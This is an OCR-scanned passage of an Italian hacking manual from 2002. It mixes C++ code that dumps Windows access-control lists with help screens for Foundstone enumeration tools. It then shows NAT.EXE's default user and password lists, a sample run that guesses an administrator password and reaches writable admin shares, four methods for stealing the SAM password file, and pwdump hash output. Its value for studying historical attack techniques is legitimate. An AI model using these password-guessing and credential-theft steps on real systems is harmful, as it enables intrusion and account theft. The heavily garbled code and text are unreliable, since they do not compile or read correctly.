DWORD cbname = sizeof name, ebdomain = sizeof domain, re; 
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//.'.' next line has hardcoded server name !! 

// NULL server name is usually appropriate, though. 

if C LookupAccountSid ( NULL, psid, name, Scbname, domain, Scbdomain, SsidUse ) 



{ 



switch C sidUse ) 
{ 

case SidTypeUser: type = "user"; break; 

case SidTypeGroup : type = "group"; break; 

case SidTypeDomain : type = "domain" ; break; 

case SidTypeAlias : type = "alias"; break; 

case SidTypeWellKnownGroup : type = "well-known group"; break; 

case SidTypeDeletedAccount : type = "well-known account " ; 



break; 



case SidTypelnvalid: type = "invalid type"; break; 

case SidTypeUnknown : type = "unknown type"; break; 

default : type = "bad sidUse 

value"; break; 

} 

printff "%s%s%s (%s)\n", domain, < domain ==011 *domain == '\0' )? 
"\\", name, type ); 
} 

else 
{ 

re = GetLastError ( ) ; 

printf( " [%s] *** error %lu\n", sidToText ( psid ), re ) ; 

} 



void printAce ( int ind, bool isSacl, int index, PACL acl, const FlagText *permflags /* 

= 0 */ ) 

{ 

ACE_HEADER *ace; 
char *type; 
int i; 
bool first; 
DWORD j; 
PSID psid; 



}, 



}, 



static FlagText inheritflags [] = { 

{ CONTAINER_INHERIT__ACE, "CONTAINER_ INHERIT_ACE " 
{ INHERIT_ONLY_ACE, " INHERIT_ONLY__ACE " }, 
{ NO_PROPAGATE_INHERIT_ACE, "NO_PROPAGATE_INHERIT_ACE" 
{ OBJECT_ INHERI T_ACE, "OBJECT_INHERIT_ACE " }, 

{ SUB_ CONTAINERS_ ONL Y_ INHERIT, "SUB_CONTAINERS_ONLY_INHERIT" 
{ SUB_OBJECTS_ONLY_INHERIT, "SUB_OBJECTS_ONLY_INHERIT" }, 
{ SUB__ CONTAINERS_AND_ OBJECTS_ INHERI T, 
n SUB_CONTAINERS__AND_OBJECTS_INHERIT" } , 

{ FAILED_ACCESS_ACE__FLAG, "FAILED_ACCESS_ACE_FLAG" }, 

{ SUCCESSFUL_ACCESS_ACE__FLAG, "SUCCESSFUL_ACCESS_ACE_FLAG" }, 



}, 



INHERITED^ACE, 
0, 0 } 



" INHERI TED_ACE" ), 



}; 

static FlagText defaultpermflags[] = { 





{ /* 


0x00000001 


*/ 


FILE_READ_DATA, "file : 


FILE_READ_DATA, dir: 


FILE_ 


LIST DIRECTORY 


" }, 












{ /* 


0x00000002 


*/ 


FILE_WRITE_ 


DATA, "file: FILE_ WRITE_DATA, dir: 


FILE_ 


ADD FILE" }, 














{ /* 


0x00000004 


*/ 


FILE_APPEND 


_DATA, "file: FILE_APPEND__DATA, dir: 


FILE_ 


ADD SUBDIRECTORY " }, 












{ /* 


0x00000008 


*/ 


FILE_READ_EA, "FILE_READ_EA" }, 




{ /* 


0x00000010 


*/ 


FILE_WRITE_ 


EA, "FILE_WRITE_EA " }, 




{ /* 


0x00000020 


*/ 


FILE_EXECUTE, "file: FILE_EXECUTE, dir: 


FILE_ 


TRAVERSE" }, 














{ /* 


0x00000040 


*/ 


FILE_DELETE 


_CHILD, "FILE_DELETE_CHILD " }, 




{ /* 


0x00000080 


*/ 


FILE_READ_ATTRIBUTES, 


"FILE_READ_ATTRIBUTES " }, 




{ /* 


0x00000100 


*/ 


FILE_WRITE_ 


ATTRIBUTES, 


"FILE_WRITE__ATTRIBUTES " }, 




{ /* 


0x00000200 


*/ 


0x00000200, 


"unknown " 


}, 




{ /* 


0x00000400 


*/ 


0x00000400, 


"unknown " 


}, 




{ /* 


0x00000800 


*/ 


0x00000800, 


"unknown " 


}, 




{ /* 


0x00001000 


*/ 


0x00001000, 


"unknown " 


}, 




{ /* 


0x00002000 


*/ 


0x00002000, 


"unknown " 


}, 




{ /* 


0x00004000 


*/ 


0x00004000, 


"unknown " 


}, 
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{ 


/* 


OxOOlfOlff 


*/ 


FILE_ALL_ACCESS, "FILE_ALL_ACCESS " }, 


{ 


/* 




*/ 


FILE_GENERIC_READ, "FILE_GENERIC_READ" }, 


{ 


/* 




*/ 


FILE__ GENERIC_ WRI TE, "FILE_GENERIC__WRITE" }, 


{ 


/* 




*/ 


FILE_GENERIC_EXECUTE, "FILE_GENERIC_EXECUTE " }, 


{ 


/* 


0x00010000 


*/ 


DELETE, "DELETE" }, 


{ 


/* 


0x00020000 


*/ 


READ_CONTROL, "READ_CONTROL" }, 


{ 


/* 


0x00040000 


*/ 


WRITE_DAC, "WRITE_DAC " }, 


{ 


/* 


0x00080000 


*/ 


WRITE_OWNER, "WRITE_OWNER " }, 


{ 


/* 


0x00100000 


*/ 


SYNCHRONIZE, " SYNCHRONIZE " }, 


{ 


/* 


0x00200000 


*/ 


0x00200000, "unknown" }, 


{ 


/* 


0x00400000 


*/ 


0x00400000, "unknown" }, 


{ 


/* 


0x00800000 


*/ 


0x00800000, "unknown" }, 


{ 


/* 


0x01000000 


*/ 


ACCESS_SYSTEM_SECURITY, "ACCESS_SYSTEM_SECURITY" }, 


{ 


/* 


0x02000000 


*/ 


MAXIMUM_ALLOWED, "MAXIMUM_ALLOWED" }, 


{ 


/* 


0x04000000 


*/ 


0x04000000, "unknown" }, 


{ 


/* 


0x08000000 


*/ 


0x08000000, "unknown" }, 


{ 


/* 


0x10000000 


*/ 


GENERIC_ALL, "GENERIC__ALL " }, 


{ 


/* 


0x20000000 


*/ 


GENERIC_EXECUTE, " GENERI C_EXECUTE " ), 


{ 


/* 


0x40000000 


*/ 


GENERIC_ URITE, " GENERIC_WRITE " }, 


{ 


/* 


0x80000000 


*/ 


GENERIC^READ, "GENERIC_READ " }, 


{ 


/* 


OxOOOOffff 


*/ 


SPECIFIC_RIGHTS__ALL, "SPECIFIC_RIGHTS_ALL " } , 


{ 


/* 


OxOOOfOOOO 


*/ 


STANDARD_RIGHTS_REQUIRED, " STANDARD_RIGHTS REQUIRED " 


{ 


/* 


OxOOlfOOOO 


*/ 


STANDARD_RIGHTS_ALL, "STANDARD_RIGHTS_ALL" }, 


{ 


o, 


0 } 







if ( permflags == 0 ) 

permflags = defaultpermflags; 
if ( ! GetAce ( acl, index, (void **) Sace ) ) 
{ 

printf( "%s%cACL, entry %d: GetAce () failed, gle == %lu\n", 

indenti ind ), isSacl? 'S': 'D ' , index, GetLastError () ); 

return; 

} 

switch ( ace->AceType ) 
{ 

case ACCESS__ALLOWED_ACE_TYPE : 

type = "ACCESS_ALLOWED_ACE_ TYPE " ; 

psid = &( (ACCESS_ALLOWED_ACE *) ace )->SidStart; 
break; 

case ACCESS_DENIED_ACE_ TYPE : 

type = "ACCESS_DENIED_ACE_TYPE"; 

psid = &( (ACCESS_DENIED_ACE *) ace )->SidStart; 
break; 

case SYSTEM_AUDIT_ACE_ TYPE : 

type = " SYSTEM_AUDIT_ACE_TYPE " ; 

psid = &( (SYSTEM_AUDIT_ACE *) ace )->SidStart; 
break; 

case SYSTEM_ALARM_ACE__TYPE : 

type = "SYSTEM_ALARM__ACE_TYPE"; 

psid = &( (SYSTEM_ALARM_ACE *) ace )->SidStart; 
break; 

iif 0 

case ACCESS_ALLOWED_ COMPOUND__ACE_ TYPE : 

type = "ACCESS_ALLOWED_COMPOUND_ACE_TYPE" ; 

psid = & ( (ACCESS_ALLOWED_COMPOUND_ACE *) ace )->SidStart; 
break; 

iendif 

case ACCESS_ALLOHED_OBJECT_ACE__ TYPE : 

type = "ACCESS_ALLOWED_OBJECT_ACE_TYPE" ; 

psid = &( (ACCESS_ALLOWED_OBJECT_ACE *) ace )->SidStart; 
break; 

case ACCESS_DENIED_OBJECT_ACE_ TYPE : 

type = "ACCESS__DENIED_OBJECT_ACE_TYPE"; 

psid = &( (ACCESS_DENIED_OBJECT_ACE *) ace )->SidStart; 
break; 

case SYSTEM_AUDIT__OBJECT_ACE_TYPE: 

type = " SYSTEM_AUDIT_OBJECT__ACE_ TYPE "; 

psid = &( (SYSTEM_AUDIT_OBJECT_ACE *) ace )->SidStart; 
break; 

case SYSTEM_ALARM_OBJECT_ACE_TYPE: 

type = " SYSTEM_ALARM_OBJECT_ACE_ TYPE "; 

psid = &( (SYSTEM_ALARM_OBJECT_ACE *) ace )->SidStart; 
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type = " invalid-ACE-type" ; 

psid = &( (ACCESS_ALLOWED__ACE *) ace )->SidStart; 
break; 

} 

pr±ntf< "%s%cACL entry %d\n", indenti ind ), isSacl? 'S': 'D ' , index ); 
printf( "%sACE type: %s (%lu)\n", indenti ind + 2 ), type, (DWORD) ace->AceType 



printf( "isTrustee: ", indenti ind + 2 ) ); 
printSid ( psid ) ; 

printf ( "%slnheritance/auditing: ", indent ( ind + 2 ) ) ; 

for ( j = ace->AceFlags , i = 0 ; i < 8; i ++ ) 

{ 

if ( i != 0 && i % 4 == 0 ) 

putchar( ' ' ); 
putchar( ( j & 0x80 )? '!<: '0' ); 
j «= i; 

} 

putchar( '\n' ); 

for ( i = 0, first = true; inheritflags [i] .txt != 0; i ++ ) 
{ 

if ( inheritflags [i] . flag == ( inheritflags [i] . f lag S ace->AceFlags ) ) 
{ 

printf ( "%s%s\n", indenti ind + 4 ), inheritflags [i] .txt ); 
first = false; 

} 

} 

if ( first ) 
{ 

printf ( "%sNO_INHERITANCE\n", indenti ind + 4 ) ); 

} 

printf ( "%sPermissions : ", indent ( ind + 2 ) ); 

for ( j = ( (ACCESS_ALLOWED_ACE *) ace )->Mask, i = 0; i < 32; i ++ ) 
{ 

if ( i != 0 && i % 4 == 0 ) 

putchar( ' ' ); 
if ( i != 0 && i % 16 == 0 ) 

putchar( '-' ); 
if ( i != 0 && i % 8 == 0 ) 

putchar( ' ' ); 
putchar( ( j & 0x80000000 )?'!': '0' ); 
j «= i; 

} 

putchar( '\n' ); 

j = ( (ACCESS_ALLOWED_ACE *) ace )->Mask; 

for ( i = 0, first = true; permflags [i] . txt != 0; i ++ ) 
{ 

if ( permflags [i] . flag == ( permflags [i] . flag s j ) ) 
{ 

printf( "%s%081Xh %s\n", indent ( ind + 4 ), permflags[i].flag, 

permflags [i ] . txt ) ; 

first = false; 

} 

} 

if ( first ) 
{ 

indent ( ind + 4 ) ; 

printf ( "%s(none)\n", indenti ind + 4 ) ); 

} 

} 



void printAcl ( int ind, bool isSacl, PACL acl, const FlagText *permflags /* = 0 */ ) 
{ 

DWORD i; 

ACL_SIZE_INFORMATION aci; 

if ( acl == 0 ) 
return; 

if ( ! GetAclInformation( acl, Saci, sizeof aci, AclSizelnformation ) ) 
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return; 

} 

printf ( "%s%cACL header: %lu ACEs, %lu bytes used, %lu bytes free\n", 

indenti ind ), isSacl? 'S': 'D', aci .AceCount, aci .AclBytesInUse, 
aci .AclBytesFree ); 

for ( i = 0; i < aci . AceCount ; ++ i ) 

printAce ( ind + 2, isSacl, i, acl, permflags ); 



void printSD( int ind, SECURITY^DESCRIPTOR *psd, const FlagText *permflags /* = 0 */ ) 
{ 

SECURITY_DESCRIPTOR__CONTROL sdc; 
DWORD rev; 

PSID psidOwner, psidGroup; 

int ownerDefaulted, groupDefaulted; 

PACL dacl, sacl; 

int daclPresent, daclDefaulted; 

int saclPresent, saclDefaulted; 

int i; 

bool first; 

WORD j; 

static struct { 

WORD flag; 

char *txt; 
} ctlflagsU = { 



{ 


/* 


0x0001 


*/ 


SE_ OWNER_DEFAUL TED, " SE_OWNER_DEFAULTED " }, 


{ 


/* 


0x0002 


*/ 


SE_ GROUP_DEFAUL TED, " SE_GROUP_DEFAULTED " }, 


{ 


/* 


0x0004 


*/ 


SE_DACL_PRESENT, " SE__DACL PRESENT " }, 


{ 


/* 


0x0008 


*/ 


SE_DACL__DEFAULTED , " SE_DACL_DEFAUL1ED " }, 


{ 


/* 


0x0010 


*/ 


SE__ SACL PRESENT, " SE_SACL PRESENT " }, 


{ 


/* 


0x0020 


*/ 


SE_ SACL_DEFAUL TED, " SE_SACL_DEFAULTED " }, 


{ 


/* 


0x0040 


*/ 


0x0040, "unknown" }, 


{ 


/* 


0x0080 


*/ 


0x0080, "unknown" }, 


{ 


/* 


0x0100 


*/ 


SE_DACL_AUTO_ INHERIT_REQ, "SE_DACL_AUTO_ IÌKERIT_REQ " 


{ 


/* 


0x0200 


*/ 


SE_SACL_AUTO_INHERIT_REQ, "SE_SACL_AUTO_INHERIT_REQ " 


{ 


/* 


0x0400 


*/ 


SE DACL__AUTO_INHERITED, " SE_DACL_AVTO__INHERITED " }, 


{ 


/* 


0x0800 


*/ 


SE_SACL__AUTO_INHERITED, " SE_SACL_AUTO_INHERITED " }, 


{ 


/* 


0x1000 


*/ 


SE_DACL_PROTECTED , " SE_DACL_PROTECTED " }, 


{ 


/* 


0x2000 


*/ 


SE_SACL_PROTECTED, "SE_SACL__PROTECTED" }, 


{ 


/* 


0x4000 


*/ 


0x4000, "unknown" }, 


{ 


/* 


0x8000 


*/ 


SE_SELF_RELATIVE, "SE_SELF_RELATIVE" }, 



}; 

if ( psd == 0 ) 

{ 

printf ( "%sPSECURITY_DESCRIPTOR: is NULL, cannot dump\n", indenti ind ) 
return; 

} 

if ( ! GetSecurityDescriptorControl ( psd, &sdc, Srev ) ) 
{ 

printf C "%sSECURITY_DESCRIPTOR: *** GSDC() failed, gle = %lu\n", 
indent( i-nd ), GetLastError () ); 

return; 

} 

printf ( "%sSECURITY_DESCRIPTOR: rev = %lu, length = %lu bytes\n", 
indent ( ind ) , rev, GetSecurityDescriptorLength ( psd ) ) ; 

printf C "%sSD control: ", indenti ind + 2 ) ); 
for ( j = sdc, i = 0; i < 8 * sizeof WORD; ++ i ) 
{ 

if ( i .'= 0 44 i % 4 == 0 ) 

puteharf ' ' ); 
if ( i != 0 SS i % 16 == 0 ) 

putchar( '-' ); 



if ( i .'= 0 44 i % 8 == 0 ) 
putehar ( ' ' ); 
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putchar( '\n' ) ; 
j = sdc; 

for ( i = 0, first = true; i < lenof ( ctlflags ) ; i ++ ) 
{ 

if C ctlflags [i] .f lag == ( ctlflags [i] . f lag & j ) ) 
{ 

printf( "%s%04hXh %s\n", Indent ( ind + 4 ), ctlflags [i] .f lag, 

ctlflags [i ] . txt ) ; 

first = false; 

} 

} 

if ( first ) 
{ 

indent ( ind + 4 ) ; 

printf( "%s(none)\n", indent ( ind + 4 ) ) ; 

} 

ind += 2; 

if ( ! GetSecurityDescriptorOwner ( psd, SpsidOwner, SownerDefaulted ) ) 
{ 

printf( "%sOwner: *** GSDO() failed, gle == %lu\n" , indenti ind ), 
GetLastError () ) ; 
} 
{ 

printf( "%sOwner: %s", indent ( ind ), ownerDefaulted? " [def] ": "" ); 
printSid( psidOwner ); 

} 

if ( ! GetSecurityDescriptorGroup ( psd, SpsidGroup, SgroupDefaulted ) ) 
{ 

printf( "%sGroup: *** GSDG ( ) failed, gle == %lu", indent ( ind ), 
GetLastError () ) ; 
} 
{ 

printff "%sGroup: %s", indent ( ind ), groupDefaulted? "[def] ": "" ); 
printSid( psidGroup ); 

} 

dacl = 0; 

if ( ! GetSecurityDescriptorDacl ( psd, SdaclPresent , Sdacl, SdaclDefaulted ) ) 
{ 

printf( "%sDACL: *** GSDD ( ) failed, gle == %lu", indent ( ind ), 
GetLastError () ) ; 
} 
{ 

printf( "isDACL: %s%s%s\n", indent ( ind ), daclPresent? "[presentì": 

"[absent]", 

daclDefaulted? "[defaulted]": " [speci fied] " , dacl == 0? " [NULL 

DACL] ": "" ) ; 

if C dacl '.= 0 ) 

printAcl ( ind + 2, false, dacl, permflags ) ; 

} 

sacl = 0; 

if ( ! GetSecurityDescriptorSacl ( psd, SsaclPresent , Ssacl, SsaclDefaulted ) ) 
{ 

printff "%sSACL: *** GSDD ( ) failed, gle == %lu", indent ( ind ), 
GetLastError () ) ; 
} 
{ 

printff "%sSACL: %s%s%s\n", indent ( ind ), saclPresent? " [present] " : 

"[absent]", 

saclDefaulted? "[defaulted]": " [speci fied] " , sacl == 0? "[NULL 

SACL] ": "" ) ; 

if ( sacl != 0 ) 

printAcl ( ind + 2, true, sacl, permflags ) ; 

} 

} 

Il file d'include relativo a dumpacl.cpp è dumpacl.h : 

struct FlagText 
{ 
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char *txt; 

}; 

// returns the address of a listatici!, non-thread- locai , buffer with 
// the text representation of the SID that was passed in 
const char *sidToText ( PSID psid ) ; 

// getSecurityPriv () may be used by the Caller to enable SE_SECURITY_NAME . 
// if this is not done, don't ask for SYSTEM_SECURITY_INFORMATION ! 
bool getSecurityPriv ( void ) ; 

// Translates a SID and terminates it with a linefeed. No provision is 
// made to dump the SID in textual fona if LookupAccountSidf) fails. 
void printSidf PSID psid ) ; 

// Displays the index— th (O—based) ACE from ACL with an indent of _ind_ 

// spaces; isSacl, if true, causes interpretation as an SACL, else DACL 

void printAce ( int ind, bool isSacl, int index, PACL acl, const FlagText *permflags = 

0 ); 

// Dumps an entire ACL with an indent of _ind_ spaces; isSacl decides 
// whether it will be labeled "SACL" or "DACL" 

void printAcl ( int ind, bool isSacl, PACL acl, const FlagText *permflags = 0 ); 

// printSD () displays an entire SECURITY_DESCRIPTOR with the usuai indent. 
voidprintSD( int ind, SECURITY_DESCRIPTOR *psd, const FlagText *permflags = 0 ) ; 



Il file std.h contiene invece : 

idefine _WIN32_WINNT 0x0500 
idefine WINVER 0x0500 

^include <windows.h> 
iinclude <aclapi.h> 
^include <stdio.h> 
^include <string.h> 

La panoramica sulle Utilities legate alle funzioni di enumerazione è particolarmente lunga in 

quanto ormai la rete è diventata una fonte inesauribile di risorse. 

All'interno di quello chiamato ForensicToolkit20.zip troverete diverse Utilities 

Questa serie di programmi è firmato dalla Foundstone na società leader nel campo della 

sicurezza informatica ( www.foundstone.com) . 

Il primo file si chiama AUDITED e le opzioni che compaiono lanciandolo da prompt dos sono 
F : \Temp>audited /? 

Seek and Destroy - Information Warfare 

Audited vi. 5 - Copyright (c) 1998, Foundstone, Inc. 
NTFS SACL Reporter - Finds audited files 
Programming by JD Glaser - Ali Rights Reserved 
Usage - audited [path] /ns 

[dirpath] Directory to search - none equals current 

-d Dump file audit attributes 

-r [hivekey] Dump registry audit attributes 

-s [subkey] Optional sub-key to search 

-v Verbose mode 

-ns Skip sub-directories/sub keys 

- or / Either switch statement can be used 

Reg key constants are - HKLM, HKCR, HKCU, HKU, HKCC 
Dumps entire reg if no keyname is specified 
-? Help 
COMMAND PROMPT MUST HAVE A MINIMUM WIDTH OF 80 CHARACTERS 
Zechariah 12:9 - "I will seek to destroy ali nations who oppose 
Jerusalem" 

See http://www.foundstone.com for updates/fixes 
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Un altro utility compresa dentro al file .ZIP è il seguente : 

F : \Temp>DACLCHK 

Seek and Destroy - Information Warfare 

DACLchk vi. 2 - Copyright (c) 1999, Foundstone, Inc. 
NTFS DACL ACE Order Detector 

Dumps any ACL that has Denied and Allowed ACE's in reverse order 
Programming by JD Glaser - Ali Rights Reserved 
Usage - sfind [path] /ns 

[dirpath] Directory to search - none equals current 

-d Dump ali DACL's - Don't detect reversed ACE's 

-ns Skip sub-directories 

- or / Either switch statement can be used 

-? Help 
COMMAND PROMPT MUST HAVE A MINIMUM WIDTH OF 80 CHARACTERS 
Zechariah 12:9 - "I will seek to destroy ali nations who oppose 
Jerusalem" 

See http://www.foundstone.com for updates/fixes 
F: \Temp> 

HUNT invece è un Utilities che enumera le condivisioni Samba. 
F: \Temp>hunt 

Seek and Destroy - Information Warfare 
Hunt vi. 2 - Copyright (c) 1998, Foundstone, Inc. 
SMB share enumerator and admin finder 
Programming by JD Glaser - Ali Rights Reserved 

Usage - hunt Wservername 

/? = Help 

Zechariah 12:9 - "I will seek to destroy ali nations who oppose 
Jerusalem " 

See http://www.foundstone.com for updates/fixes 



Il pacchetto è comprensivo di una serie di altre Utilities che servono a restituire informazioni 
varie come ad esempio, nel caso di quella seguente, l'ora dell'ultimo accesso ad un file 
system NTFS. 

F: \Temp>afind 

Seek and Destroy - Information Warfare 

AFind v2.00 - Copyright (c) 2000, Foundstone, Inc. 
NTFS Last Access Time Finder 

Programming by JD Glaser - Ali Rights Reserved 

Command Line Switches 

[dirname] Directory to search 

-f [filename] List last access time of file 

-s [seconds] Files accessed less than x seconds ago 

-m [minutes] Files accessed less than x minutes ago 

-h [hours] Files accessed less than x hours ago 

-d [days] Files accessed less than x days ago 

-a [d/m/y-h:m: s] Files accessed after this date/time 

-ns Exclude sub-directories 

- or / Either switch statement can be used 

-? Help 

Additional time frame usage: 
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afind /s 2-4 Files accessed between 2 and 4 seconds ago 
afind /m 2-4 Files between 2 and 4 minutes ago 
afind /s 2-4 Files between 2 and 4 seconds ago 
afind /a 14/7/1998-3:12:06-15/7/1998-2:05:30 Files between 
these dates 

COMMAND PROMPT MUST HAVE A MINIMUM WIDTH OF 80 CHARACTERS 
Zechariah 12:9 - "I will seek to destroy ali nations who oppose 
Jerusalem" 

See http://www.foundstone.com for updates/fixes 
F:\Temp> 

L'altra Utilities, hfind, possiede come sintassi : 
F : \Temp>hfind /? 

Seek and Destroy - Information Warfare 

HFind v2.00 - Copyright (c) 2000, Foundstone, Inc. 
Hidden file finder with last access times 
Programming by JD Glaser - Ali Rights Reserved 
Usage - hfind [path] /ns 

[dirpath] Directory to search - none equals current 

-ns Skip sub-directories 

- or / Either switch statement can be used 

-? Help 
COMMAND PROMPT MUST HAVE A MINIMUM WIDTH OF 80 CHARACTERS 
Zechariah 12:9 - "I will seek to destroy ali nations who oppose 
Jerusalem" 



See http://www.foundstone.com for updates/fixes 




SFIND invece rappresenta un alternate data strema finder. 



F : \Temp>sfind /? 

Seek and Destroy - Information Warfare 

SFind vi. 2. 2 - Copyright (c) 1998, Foundstone, Inc. 
Alternate Data Stream Finder 

Programming by JD Glaser - Ali Rights Reserved 
Usage - sfind [path] /ns 

[dirpath] Directory to search - none equals current 

-ns Skip sub-directories 

- or / Either switch statement can be used 

-? Help 
COMMAND PROMPT MUST HAVE A MINIMUM WIDTH OF 80 CHARACTERS 
Zechariah 12:9 - "I will seek to destroy ali nations who oppose 
Jerusalem" 



See http://www.foundstone.com for updates/fixes 




La seguente utility invece esegue il DUMP delle informazioni legate alla sicurezza di un file 
system NTFS. 

F : \Temp>Filestat -? 

Seek and Destroy - Information Warfare 
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FileStat vi. 4.1 Copyright (c) 1998, Foundstone , Inc. 
Dumps NTFS security, file, and stream attributes 
Programming by JD Glaser - Ali Rights Reserved 
Command Line Switches 

[Filename] Name of file to list 

-? Help 

Zechariah 12:9 - "I will seek to destroy ali nations who oppose 
Jerusalem" 

See http://www.foundstone.com for updates/fixes 
F:\Temp> 

Esiste un Utilities che funziona con tutte le risorse che chiunque può controllare ma tenta 
anche di trovare il metodo d'accesso alle risorse protette. 
I comandi mostrati richiedendo l'help di NAT. EXE sono : 



NAT. EXE 


(NetBIOS Auditing Tool) 


NAT. EXE 


[■ 


-o filename] [-u userlist] [-p passlist] <address> 


OPTIONS 








-o 


Speci fy the output file. Ali results front the scan 






will be written to the speci fied file, in addition 






to standard output. 




-u 


Speci fy the file to read usernames front. Usernames 






will be read front the speci fied file when attempt- 






ing to guess the password on the remote server. 






Usernames should appear one per line in the speci- 






fied file. 




~P 


Speci fy the file to read passwords from. Passwords 






will be read from the speci fied file when attempt- 






ing to guess the password on the remote server. 






Passwords should appear one per line in the speci- 






fied file. 


<address> 






Addresses should be speci fied in comma deliminated 






format, with no spaces . Valid address specifica- 






tions include: 






hostname - "hostname" is added 






127 .0.0.1-127 .0.0.3, adds addresses 127.0.0.1 






through 127.0.0.3 






127.0.0.1-3, adds addresses 127.0.0.1 through 






127. 0. 0.3 






127 .0.0.1-3, 7,10-20, adds addresses 127.0.0.1 






through 127.0.0.3, 127.0.0.7, 127 . 0 . 0 . 10 through 






127. 0. 0.20. 






hostname, 127 . 0 . 0 . 1-3, adds "hostname" and 127.0.0.1 






through 127.0.0.1 






Ali combinations of hostnames and address ranges as speci fied 


above are 





Se non viene specificato un file con gli accessi e le password, il programma utilizza una 
piccola lista come default e precisamente : 



Usernames 






"ADMINISTRATOR ", 
"USER", "DEMO", 
"IOCAI" 


"GUEST", 
"TEST" , 


"BACKUP", "ROOT", "ADMIN", 
"SYSTEM", "OPERATOR", "OPER", 


Passwords 






"ADMINISTRATOR ", 
"TEMP " , "SHARE", 
"DEMO", "TEST", 


"GUEST", 
"WRITE", 
"ACCESS" 


"ROOT", "ADMIN", "PASSWORD", 
"FULL", "BOTH", "READ", "FILES" , 
"USER", "BACKUP", "SYSTEM", 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



NAT. EXE tenta tutte le tecniche precedenti e in più prova le condivisioni amministrative, 

esegue lo scan su un range di IP ed utilizza un dizionario per provare a identificare le 

password delle risorse netbios. 

Questo tool è tra i preferiti degli HACKER. 

Quello che segue è l'output relativo all'uso di NAT. 

C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30 



[*] Reading usernames from userlist.txt 

[*] Reading passwords from passlist.txt 

[*] Checking host : 204.73.131.11 

[*] Obtaining list of remote NetBIOS names 

[*] Attempting to connect with name: * 

[*] Unable to connect 

[*] Attempting to connect with name: *SMBSERVER 

[*] CONNECTED with name: *SMBSERVER 

[*] Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 

[*] Server time is Mon Dee 01 07:44:34 1997 

[*] Timezone is UTC-6.0 

[*] Remote server wants us to encrypt, telling it not to 

[*] Attempting to connect with name: *SMBSERVER 

[*] CONNECTED with name: *SMBSERVER 

[*] Attempting to establish session 

[*] Was not able to establish session with no password 

[*] Attempting to connect with Username: * ADMINISTRATOR' Password: "password' 

[*] CONNECTED: Username: "ADMINISTRATOR' Password: "password' 

[*] Obtained server Information: 

Server= [STUDENTI] User=[] Workgroup= [D0MAIN1] Domain=[] 

[*] Obtained listing of shares: 

Sharename Type Comment 



ADMIN$ Disk: Remote Admin 

C$ Disk: De fault share 

IPC$ IPC: Remote IPC 

NETLOGON Disk: Logon server share 

Test Disk: 

[*] This machine has a browse list: 

Server Comment 

STUDENTI 



[*] Attempting to access share: \ \ *SMBSERVER\ 

[*] Unable to access 

[*] Attempting to access share: \\*SMBSERVER\ADMIN$ 

[*] WARNING: Able to access share: \\*SMBSERVER\ADMIN$ 

[*] Checking write access in: \\*SMBSERVER\ADMIN$ 

[*] WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ 

[*] Attempting to exercise .. bug on: \\*SMBSERVER\ ADMIN $ 

[*] Attempting to access share: \\*SMBSERVER\C$ 

[*] WARNING: Able to access share: \\*SMBSERVER\C$ 

[*] Checking write access in: \\*SMBSERVER\C$ 

[*] WARNING: Directory is writeable: \\*SMBSERVER\C$ 

[*] Attempting to exercise .. bug on: \\*SMBSERVER\C$ 

[*] Attempting to access share: \\*SMBSERVER\NETLOGON 

[*] WARNING: Able to access share: \\*SMBSERVER\NETLOGON 

[*] Checking write access in: \\*SMBSERVER\NETLOGON 

[*] Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON 
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[*] WARNING: Able to access share: \\*SMBSERVER\Test 

[*] Checking write access in: \ \ *SMBSERVER\Test 

[*] Attempting to exercise .. bug on: \\*SMBSERVER\Test 

[*] Attempting to access share: \\*SMBSERVER\D$ 

[*] Unable to access 



[*] Attempting to access share: \\*SMBSERVER\ROOT 

[*] Unable to access 




Windows contiene i dati relativi ai login, quindi anche le password, dentro al file SAM 
(Security Accounts Manager). 

Le password sono criptografate per cui la loro lettura non può essere effettuata 
semplicemente leggendo il file con un editor. 

Con lo scopo di decrittografare un file di password esistono diverse Utilities le quali si basano 
come al solito o su vocabolari di parole o mediante il metodo delle combinazioni utilizzanti i 
caratteri e i numeri specificati. 

Abbiamo visto nei capitoli relativi ai metodi usati per impossessarsi del file SAM che una volta 
portato in locale questo file può essere analizzato da utility come LC3 le quali sono in grado, 
magari con un po' di tempo a disposizione, di trovare le varie passwords presenti dentro a 
questo. 

NT slava il file SAM dentro alla directory : 
%systemroot % \ system32 \ config 

Questpo file è uno dei cinque più importanti per Windows e si trova bloccato dal sistema 
operativo si dalla sua partenza. 

Esistono quattro metodi per riuscire a impossessarsi di questo file: 

1 Partire con un sistema operativo diverso e copiare questo file su di un floppy 

2- Copiare il file di backup creato da un utility NT per la riparazione del disco 

3- Estrarre le passwords direttamente dal file SAM 

4- Esecuzione del metodo definito con il termine di Eavesdropping on Network Password 
Exchange 

Quest'ultimo metodo utilizza un sistema di capture dei pacchetti SMB eseguita dal software 
chiamato lOphtcrack 

Nel primo caso è necessario utilizzare un sistema operativo o un utility che esegua il mount 
del sistema NTFS in quanto se fosse utilizzato un semplice DOS il contenuto del disco fisso 
formattato appunto in NTFS non sarebbe visto. 

Nel secondo caso il lancio del NT Repairr Disk Utility (rdisk) con l'opzione /s creerebbe dentro 
alla directory 



un file chiamato sam._ il quale risulterebbe essere compresso con l'utility di compressione di 
Microsoft. 

La sua normalizzazione potrebbe avvenire lanciando 



Il terzo metodo invece utilizza delle utilties chiamate PWDUMP e PWDUMP2. 

Windows non memorizza le password ma al loro posto memorizza degli hash che altro non 

sono che valori numerici calcolati in base alle password. 

Di fatto non si potrebbe risalire da questi hash alle password. 

La lista viene memorizzata dentro al file\winnt\system32\config chiamato SAM. 

PWDUMP esegue prima un attacco a questo file mediante dizionari e poi mediante il brute 

force method. 

Il programma è prelevabile da : 
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http://razor.bindview.com 
L'output prodotto è il seguente : 

F: \SystBmTools>pwdump 

Administrator : 500: 58B2AD2824C4AEEA7B8374D9880D1 625 : 9F69F7B59F27B57E4 74E3D4698E75 
B2B:Built—in account for administering the computer/domain:: 

Guest : 501 :********************************: ******************************** :Buil 
t-in account for guest access to the computer /domain : : 

Net ShowServi ces : 1001 : 2073 7 ABI 2BB9BCA94 05 7FCBEA 7FEB1 64 : E81FF92C4D951 92A1 4 8BEBAB0E 
742297 -.Windows Media services run under this account , Windows Media services run 
under this account : : 

IUSR__DEVELOPMENT:1003:F8905E86ABB89F29736B96983010C83A:F764F98AACC9247028F5E1A3F 
